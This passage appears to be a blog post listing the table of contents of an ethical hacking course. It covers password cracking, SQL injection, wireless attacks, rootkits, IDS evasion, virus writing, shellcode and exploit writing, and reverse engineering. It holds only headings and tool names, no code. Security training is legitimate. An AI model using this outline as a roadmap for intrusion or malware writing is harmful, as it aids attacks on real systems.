o HTTP Authentication
• Basic Authentication
• Digest Authentication
o Integrated Windows (NTLM) Authentication
o Negotiate Authentication
o Certificate-based Authentication
o Forms-based Authentication
o RSA Secure Token
o Biometrics
• Face recognition
• Iris scanning
• Retina scanning
• Fingerprinting
• Hand geometry
• Voice recognition
How to Select a Good Password?
Things to Avoid in Passwords
Changing Your Password
Protecting Your Password
How Hackers get hold of Passwords?
Windows XP: Remove Saved Passwords
Microsoft Password Checker
What is a Password Cracker?
Modus Operandi of an Attacker Using Password Cracker
How does a Password Cracker Work?
Classification of Attacks
Password Guessing
Query String
Cookies
Dictionary Maker
Available Password Crackers
o LOphtcrack
o John The Ripper
o Brutus
Hacking Tools
o Obiwan
o Authforce
o Hydra
o Cain And Abel
o RAR
o Gammaprog
o WebCracker
o Munga Bunga
o PassList
o SnadBoy
o WinSSLMiM
o ReadCookies.html
o Wireless WEP Key Password Spy
o RockXP
o WinSSLMiM
o Password Spectator
Countermeasures
Module 14: SQL Injection
Introducing SQL injection
Exploiting Web Applications
SQL Injection Steps
o What Should You Look For?
o What If It Doesn’t Take Input?
o OLE DB Errors
o Input Validation Attack
SQL Injection Techniques
How to Test for SQL Injection Vulnerability?
How does it Work?
Executing Operating System Commands
Getting Output of SQL Query
Getting Data from the Database Using ODBC Error Message
How to Mine all Column Names of a Table?
How to Retrieve any Data?
How to Update/Insert Data into Database?
Automated SQL Injection Tool
o AutoMagic SQL
o Absinthe
SQL Injection in Oracle
SQL Injection in MySql Database
Attack against SQL Servers
SQL Server Resolution Service (SSRS)
Osql L- Probing
SQL Injection Automated Tools
o SQLDict
o SqlExec
o SQLbf
o SQLSmack
o SQL2.exe
SQL Injection Countermeasures
Preventing SQL Injection Attacks
SQL Injection Blocking Tool: SQLBlock
Acunetix Web Vulnerability Scanner
Module 15: Hacking Wireless Networks
Introduction to Wireless Networking
Wired Network vs. Wireless Network
Effects of Wireless Attacks on Business
Types of Wireless Networks
Advantages and Disadvantages of a Wireless Network
Wireless Standards
o 802.11a
o 802.11b – “WiFi”
o 802.11g
o 802.11i
o 802.11n
Related Technology and Carrier Networks
Antennas
Cantenna
Wireless Access Points
SSID
Beacon Frames
Is the SSID a Secret?
Setting Up a WLAN
Detecting a Wireless Network
How to Access a WLAN
Terminologies
Authentication and Association
Authentication Modes
Authentication and (Dis)Association Attacks
Rogue Access Points
Tools to Generate Rogue Access Points: Fake AP
Tools to Detect Rogue Access Points: Netstumbler
Tools to Detect Rogue Access Points: MiniStumbler
Wired Equivalent Privacy (WEP)
What is WPA?
WPA Vulnerabilities
WEP, WPA, and WPA2
Steps for Hacking Wireless Networks
o Step 1: Find networks to attack
o Step 2: Choose the network to attack
o Step 3: Analyze the network
o Step 4: Crack the WEP key
o Step 5: Sniff the network
Cracking WEP
Weak Keys (a.k.a. Weak IVs)
Problems with WEP’s Key Stream and Reuse
Automated WEP Crackers
Pad-Collection Attacks
XOR Encryption
Stream Cipher
WEP Tools
o Aircrack
o AirSnort
o WEPCrack
o WepLab
Temporal Key Integrity Protocol (TKIP)
LEAP: The Lightweight Extensible Authentication Protocol
LEAP Attacks
MAC Sniffing and AP Spoofing
Tool to Detect MAC Address Spoofing: Wellenreiter V2
Man-in-the-Middle Attack (MITM)
Denial-of-Service Attacks
Dos Attack Tool: Fatajack
Phone Jammers
Scanning Tools
o Redfang 2.5
o Kismet
o THC-WarDrive
o PrismStumbler
o MacStumbler
o Mognet
o WaveStumbler
o StumbVerter
o Netchaser V1.0 for Palm Tops
o AP Scanner
o SSID Sniff
o Wavemon
o Wireless Security Auditor (WSA)
o AirTraf
o Wifi Finder
o AirMagnet
Sniffing Tools
o AiroPeek
o NAI Wireless Sniffer
o Ethereal
o Aerosol v0.65
o vxSniffer
o EtherPEG
o DriftNet
o AirMagnet
o WinDump
o ssidsniff
Multiuse Tool: THC-RUT
PCR-PRO-1k Hardware Scanner
Tools
o WinPcap
o AirPcap
Securing Wireless Networks
Auditing Tool: BSD-Airtools
AirDefense Guard
WIDZ: Wireless Intrusion Detection System
Radius: Used as Additional Layer in Security
Google Secure Access
Module 16: Virus and Worms
Introduction to Virus
Virus History
Characteristics of a Virus
Working of Virus
o Infection Phase
o Attack Phase
Why People create computer viruses?
Symptoms of Virus-Like Attack
Virus Hoaxes
Chain Letters
How is a Worm different from a Virus?
Indications of Virus Attack
Hardware Threats
Software Threats
Virus Damage
Modes of Virus Infection
Stages of Virus Life
Virus Classification
How does a Virus Infect?
Storage Patterns of a Virus
System Sector Viruses
Stealth Virus
Bootable CD-ROM Virus
Self-Modification
Encryption with a Variable Key
Polymorphic Code
Viruses
o Metamorphic Virus
o Cavity Virus
o Sparse Infector Virus
o Companion Virus
o File Extension Virus
o I Love You Virus
o Melissa Virus
Famous Virus/Worms – JS.Spth
Klez Virus Analysis
Writing a Simple Virus Program
Virus Construction Kits
Virus Detection Methods
Virus Incident Response
What is Sheep Dip?
Sheep Dip Computer
Virus Analysis - IDA Pro Tool
Prevention is Better than Cure
Latest Viruses
Top 10 Viruses- 2006
Anti-Virus Software
o AVG Free Edition
o Norton Antivirus
o McAfee
Socketshield
Popular Anti-Virus Packages
Virus Databases
Module 17: Physical Security
Security Statistics
Physical Security Breach Incidents
Understanding Physical Security
What Is the Need for Physical Security?
Who Is Accountable for Physical Security?
Factors Affecting Physical Security
Physical Security Checklist
o Company surroundings
o Premises
o Reception
o Server
o Workstation area
o Wireless access points
o Other equipment, such as fax, and removable media
o Access control
o Biometric Devices
o Smart Cards
o Security Token
o Computer equipment maintenance
o Wiretapping
o Remote access
o Locks
Information Security
EPS (Electronic Physical Security)
Wireless Security
Laptop Theft: Security Statistics
Laptop Theft
Laptop Security Tools
Laptop Tracker - XTool Computer Tracker
Tools to Locate Stolen Laptops
Stop's Unique, Tamper-proof Patented Plate
Tool: TrueCrypt
Laptop Security Countermeasures
Mantrap
TEMPEST
Challenges in Ensuring Physical Security
Spyware Technologies
Spying Devices
Physical Security: Lock Down USB Ports
Tool: DeviceLock
Blocking the Use of USB Storage Devices
Track Stick GPS Tracking Device
Module 18: Linux Hacking
Why Linux?
Linux Distributions
Linux – Basics
Linux Live CD-ROMs
Basic Commands of Linux
Linux File Structure
Linux Networking Commands
Directories in Linux
Compiling the Linux Kernel
How to Install a Kernel Patch?
Compiling Programs in Linux
GCC Commands
Make Install Command
Linux Vulnerabilities
Chrooting
Why is Linux Hacked?
Linux Vulnerabilities in 2005
How to Apply Patches to Vulnerable Programs?
Scanning Networks
Tools
o Nmap in Linux
o Scanning Tool: Nessus
o Tool: Cheops
o Port Scan Detection Tools
Password Cracking in Linux
Firewall in Linux: IPTables
Basic Linux Operating System Defense
SARA (Security Auditor's Research Assistant)
Linux Tool
o Netcat
o tcpdump
o Snort
o SAINT
o Ethereal
o Abacus Port Sentry
o DSniff Collection
o Hping2
o Sniffit
o Nemesis
o LSOF
o IPTraf
o LIDS
o Hunt
o TCP Wrappers
Linux Loadable Kernel Modules
Hacking Tool: Linux Rootkits
Rootkits
o Knark
o Torn
o Tuxit
o Adore
o Ramen
o Beastkit
Rootkit Countermeasures
Linux Tools: Application Security
Advanced Intrusion Detection Environment (AIDE)
Linux Tools
o Security Testing Tools
o Encryption
o Log and Traffic Monitors
o Security Auditing Tool (LSAT)
Linux Security Countermeasures
Steps for Hardening Linux
Module 19: Evading IDS, Firewalls, and Honeypots
Introduction to Intrusion Detection Systems
Terminologies
o Intrusion Detection System (IDS)
• IDS Placement
• Ways to Detect an Intrusion
• Types of Intrusion Detection Systems
• System Integrity Verifiers (SIV)
• Tripwire
• Cisco Security Agent (CSA)
• Signature Analysis
• General Indications of Intrusion System Indications
• General Indications of Intrusion File System Indications
• General Indications of Intrusion Network Indications
• Intrusion Detection Tools
• Snort 2.x
• Steps to Perform After an IDS Detects an Attack
• Evading IDS Systems
• Ways to Evade IDS
• Tools to Evade IDS
• IDS Evading Tool: ADMutate
• Packet Generators
o Firewall
• What is a Firewall?
• What does a Firewall do?
• Packet Filtering
• What can't a Firewall do?
• How does a Firewall Work?
• Firewall Operations
• Hardware Firewall
• Software Firewall
• Types of Firewalls
• Packet Filtering Firewall
• IP Packet Filtering Firewall
• Circuit-Level Gateway
• TCP Packet Filtering Firewall
• Application-Level Firewall
• Application Packet Filtering Firewall
• Stateful Multilayer Inspection Firewall
• Firewall Identification
• Firewalking
• Banner Grabbing
• Breaching Firewalls
• Bypassing a Firewall Using HTTP Tunnel
• Placing Backdoors Through Firewalls
• Hiding behind a Covert Channel: LOKI
• ACK Tunneling
• Tools to Breach Firewalls
• Common Tool for Testing Firewall & IDS
• IDS Informer
• Evasion Gateway
• Firewall Informer
o Honeypot
• What is a Honeypot?
• The Honeynet Project
• Types of Honeypots
• Advantages and Disadvantages of a Honeypot
• Where to Place a Honeypot ?
• Honeypots
• SPECTER
• honeyd
• KFSensor
• Sebek
• Physical and Virtual Honeypots
• Tools to Detect Honeypots
• What to do When Hacked?
Module 20: Buffer Overflows
Why are Programs/Applications Vulnerable?
Buffer Overflows
Reasons for Buffer Overflow Attacks
Knowledge Required to Program Buffer Overflow Exploits
Types of Buffer Overflows
o Stack-based Buffer Overflow
• Understanding Assembly Language
• Understanding Stacks
• Shellcode
o Heap/BSS-based Buffer Overflow
How to Detect Buffer Overflows in a Program
Attacking a Real Program
NOPS
How to Mutate a Buffer Overflow Exploit
Defense Against Buffer Overflows
Tool to Defend Buffer Overflow
o Return Address Defender (RAD)
o StackGuard
o Immunix System
Vulnerability Search – ICAT
Simple Buffer Overflow in C
Code Analysis
Module 21: Cryptography
Public-key Cryptography
Working of Encryption
Digital Signature
RSA (Rivest Shamir Adleman)
RC4, RC5, RC6, Blowfish
Algorithms and Security
Brute-Force Attack
RSA Attacks
Message Digest Functions
One-way Bash Functions
MD5
SHA (Secure Hash Algorithm)
SSL (Secure Sockets Layer)
RC5
What is SSH?
SSH (Secure Shell)
Government Access to Keys (GAK)
RSA Challenge
distributed.net
Cleversafe Grid Builder
PGP (Pretty Good Privacy)
Code Breaking: Methodologies
Cryptography Attacks
Disk Encryption
Hacking Tool
o PGP Crack
o Magic Lantern
o WEPCrack
o Cracking S/MIME Encryption Using Idle CPU Time
o CypherCalc
o Command Line Scriptor
o CryptoHeaven
Module 22: Penetration Testing
Introduction to Penetration Testing
Categories of Security Assessments
Vulnerability Assessment
Limitations of Vulnerability Assessment
Types of Penetration Testing
Risk Management
Do-it-Yourself Testing
Outsourcing Penetration Testing Services
Terms of Engagement
Project Scope
Pentest Service Level Agreements
Testing Points
Testing Locations
Automated Testing
Manual Testing
Using DNS Domain Name and IP Address Information
Enumerating Information about Hosts on Publicly-Available Networks
Testing Network-Filtering Devices
Enumerating Devices
Denial of Service Emulation
Tools
o Appscan
o HackerShield
o Cerberus Internet Scanner
o Cybercop Scanner
o FoundScan Hardware Appliances
o Nessus
o NetRecon
o SAINT
o SecureNET Pro
o SecureScan
o SATAN
o SARA
o Security Analyzer
o STAT Analyzer
o VigilENT
o WebInspect
Evaluating Different Types of Pentest Tools
Asset Audit
Fault Trees and Attack Trees
GAP Analysis
Threat
Business Impact of Threat
Internal Metrics Threat
External Metrics Threat
Calculating Relative Criticality
Test Dependencies
Defect Tracking Tools
o Web-based Bug/Defect Tracking Software
o SWB Tracker
o Advanced Defect Tracking Web Edition
Disk Replication Tools
o Snapback DUP
o Daffodil Replicator
o Image MASSter 4002i
DNS Zone Transfer Testing Tools
o DNS analyzer
o Spam blacklist
Network Auditing Tools
o eTrust Audit (AUDIT LOG REPOSITORY)
o iInventory
o Centennial Discovery
Trace Route Tools and Services
o Ip Tracer 1.3
o Trellian Trace Route
Network Sniffing Tools
o Sniff’em
o PromiScan
Denial-of-Service Emulation Tools
o FlameThrower®
o Mercury LoadRunner™
o ClearSight Analyzer
Traditional Load Testing Tools
o WebMux
o SilkPerformer
o PORTENT Supreme
System Software Assessment Tools
o Database Scanner
o System Scanner
o Internet Scanner
Operating System Protection Tools
o Bastille Linux
o Engarde Secure Linux
Fingerprinting Tools
o Foundstone
o @Stake LC 5
Port Scanning Tools
o Superscan
o Advanced Port Scanner
o AW Security Port Scanner
Directory and File Access Control Tools
o Abyss Web Server for windows
o GFI LANguard Portable Storage Control
o Windows Security Officer - wso
File Share Scanning Tools
o Infiltrator Network Security Scanner
o Encrypted FTP 3
Password Directories
o Passphrase Keeper 2.60
o IISProtect
Password Guessing Tools
o Webmaster Password Generator
o Internet Explorer Password Recovery Master
o Password Recovery Toolbox
Link Checking Tools
o Alert Link Runner
o Link Utility
o LinxExplorer
Web Testing-based Scripting Tools
o Svoi.NET PHP Edit
o OptiPerl
o Blueprint Software Web Scripting Editor
Buffer Overflow Protection Tools
o StackGuard
o FormatGuard
o RaceGuard
File Encryption Tools
o Maxcrypt
o Secure IT
o Steganos
Database Assessment Tools
o EMS MySQL Manager
o SQL Server Compare
o SQL Stripes
Keyboard Logging and Screen Reordering Tools
o Spector Professional 5.0
o Handy Keylogger
o Snapshot Spy
System Event Logging and Reviewing Tools
o LT Auditor Version 8.0
o ZVisual RACF
o Network Intelligence Engine LS Series
Tripwire and Checksum Tools
o SecurityExpressions
o MD5
o Tripwire for Servers
Mobile-Code Scanning Tools
o Vital Security
o E Trust Secure Content Manager 1.1
o Internet Explorer Zones
Centralized Security Monitoring Tools
o ASAP eSMART™ Software Usage by ASAP Software
o WatchGuard VPN Manager
o Harvester
Web Log Analysis Tools
o AWStats
o Azure Web Log
o Summary
Forensic Data and Collection Tools
o Encase tool
o SafeBack
o ILook Investigator
Security Assessment Tools
o Nessus Windows Technology
o NetIQ Security Manager
o STAT Scanner
Multiple OS Management Tools
o Multiple Boot Manager
o Acronis OS Selector
o Eon
Phases of Penetration Testing
o Pre-Attack Phase
o Attack Phase
o Post-Attack Phase
Penetration Testing Deliverables Templates
SELF-STUDY MODULES
Covert Hacking
Insider attacks
What is covert channel?
Security Breach
Why Do You Want to Use Covert Channel?
Motivation of a Firewall Bypass
Covert Channels Scope
Covert Channel: Attack Techniques
Simple Covert Attacks
Advanced Covert Attacks
Reverse Connecting Agents
Covert Channel Attack Tools
o Netcat
o DNS tunnel
o DNS Tunneling
• Covert Channel Using DNS Tunneling
• DNS Tunnel Client
• DNS Tunneling Countermeasures
o SSH reverse tunnel
• Covert Channel Using SSH
• Covert Channel using SSH (Advanced)
o HTTP/S Tunneling Attack
o Covert Channel Hacking Tool: Active Port Forwarder
o Covert Channel Hacking Tool: CCTT
o Covert Channel Hacking Tool: Firepass
o Covert Channel Hacking Tool: MsnShell
o Covert Channel Hacking Tool: Web Shell
o Covert Channel Hacking Tool: NCovert
o Covert Channel Hacking via Spam E-mail Messages
o Hydan
o Covert Channel Hacking Tool: NCOVERT
Writing Virus Codes
Introduction of Virus
Types of Viruses
Symptoms of a Virus Attack
Prerequisites for Writing Viruses
Required Tools and Utilities
Virus Infection Flow Chart
o Step – I Finding file to infect
• Directory Traversal Method
• “dot dot” Method
o Step – II Check viruses infection criteria
o Step – III Check for previous infection
• Marking a File for Infection
o Step – IV Infect the file
o Step – V Covering tracks
o
Components of Viruses
Functioning of Replicator part
Diagrammatical representation
Writing Replicator
Writing Concealer
Dispatcher
Writing Bomb/Payload
Trigger Mechanism
Brute Force Logic Bombs
Testing Virus Codes
Tips for Better Virus Writing
Assembly Language Tutorial
Number System
Base 10 System
Base 2 System
Decimal 0 to 15 in Binary
Binary Addition (C stands for Canary)
Hexadecimal Number
Hex Example
Hex Conversion
nibble
Computer memory
Characters Coding
ASCII and UNICODE
CPU
Machine Language
Compilers
Clock Cycle
Original Registers
Instruction Pointer
Pentium Processor
Interrupts
Interrupt handler
External interrupts and Internal interrupts
Handlers
Machine Language
Assembly Language
Assembler
Assembly Language Vs High-level Language
Assembly Language Compilers
Instruction operands
MOV instruction
ADD instruction
SUB instruction
INC and DEC instructions
Directive
preprocessor
equ directive
%define directive
Data directives
Labels
Input and output
C Interface
Call
Creating a Program
Why should anyone learn assembly at all?
o First.asm
Assembling the code
Compiling the C code
Linking the object files
Understanding an assembly listing file
Big and Little Endian Representation
Skeleton File
Working with Integers
Signed integers
Signed Magnitude
Two’s Compliment
If statements
Do while loops
Indirect addressing
Subprogram
The Stack
The SS segment
ESP
The Stack Usage
The CALL and RET Instructions
General subprogram form
Local variables on the stack
General subprogram form with local variables
Multi-module program
Saving registers
Labels of functions
Calculating addresses of local variables
Exploit Writing
Exploits Overview
Prerequisites for Writing Exploits and Shellcodes
Purpose of Exploit Writing
Types of Exploits
o Stack Overflow
o Heap Corruption
o Format String
o Integer Bug Exploits
o Race Condition
o TCP/IP Attack
The Proof-of-Concept and Commercial Grade Exploit
Converting a Proof of Concept Exploit to Commercial Grade Exploit
Attack Methodologies
Socket Binding Exploits
Tools for Exploit Writing
o LibExploit
o Metasploit
o CANVAS
Steps for Writing an Exploit
Differences Between Windows and Linux Exploits
Shellcodes
o NULL Byte
o Types of Shellcodes
Tools Used for Shellcode Development
o NASM
o GDB
o objdump
o ktrace
o strace
o readelf
Steps for Writing a Shellcode
Issues Involved With Shellcode Writing
o Addressing problem
o Null byte problem
o System call implementation
Smashing the Stack for Fun and Profit
What is a Buffer?
Static Vs Dynamic Variables
Stack Buffers
Data Region
Memory Process Regions
What Is A Stack?
Why Do We Use A Stack?
The Stack Region
Stack frame
Stack pointer
Procedure Call (Procedure Prolog)
Compiling the code to assembly
Call Statement
Return Address (RET)
Word Size
Stack
Buffer Overflows
Error
Why do we get a segmentation violation?
Segmentation Error
Instruction Jump
Guess Key Parameters
Calculation
Shell Code
o The code to spawn a shell in C
Lets try to understand what is going on here. We'll start by studying main:
execve()
o execve() system call
exit.c
o List of steps with exit call
The code in Assembly
JMP
Code using indexed addressing
Offset calculation
shellcodeasm.c
testsc.c
Compile the code
NULL byte
shellcodeasm2.c
testsc2.c
Writing an Exploit
overflow1.c
Compiling the code
sp.c
vulnerable.c
NOPs
o Using NOPs
o Estimating the Location
Windows Based Buffer Overflow Exploit Writing
Buffer Overflow
Stack overflow
Writing Windows Based Exploits
Exploiting stack based buffer overflow
OpenDataSource Buffer Overflow Vulnerability Details
Simple Proof of Concept
Windbg.exe
Analysis
EIP Register
o Location of EIP
o EIP
Execution Flow
But where can we jump to?
Offset Address
The Query
Finding jmp esp
Debug.exe
listdlls.exe
Msvcrt.dll
Out.sql
The payload
ESP
Limited Space
Getting Windows API/function absolute address
Memory Address
Other Addresses
Compile the program
Final Code
Reverse Engineering
Positive Applications of Reverse Engineering
Ethical Reverse Engineering
World War Case Study
DMCA Act
What is Disassembler?
Why do you need to decompile?
Professional Disassembler Tools
Tool: IDA Pro
Convert Machine Code to Assembly Code
Decompilers
Program Obfuscation
Convert Assembly Code to C++ code
Machine Decompilers
Tool: dcc
Machine Code of compute.exe Prorgam
Assembly Code of compute.exe Program
Code Produced by the dcc Decompiler in C
Tool: Boomerang
What Boomerang Can Do?
Andromeda Decompiler
Tool: REC Decompiler
Tool: EXE To C Decompiler
Delphi Decompilers
Tools for Decompiling .NET Applications
Salamander .NET Decompiler
Tool: LSW DotNet-Reflection-Browser
Tool: Reflector
Tool: Spices NET.Decompiler
Tool: Decompilers.NET
.NET Obfuscator and .NET Obfuscation
Java Bytecode Decompilers
Tool: JODE Java Decompiler
Tool: JREVERSEPRO
Tool: SourceAgain
Tool: ClassCracker
Python Decompilers
Reverse Engineering Tutorial
OllyDbg Debugger
How Does OllyDbg Work?
Debugging a Simple Console Application
Subscribe to:
Posts (Atom)
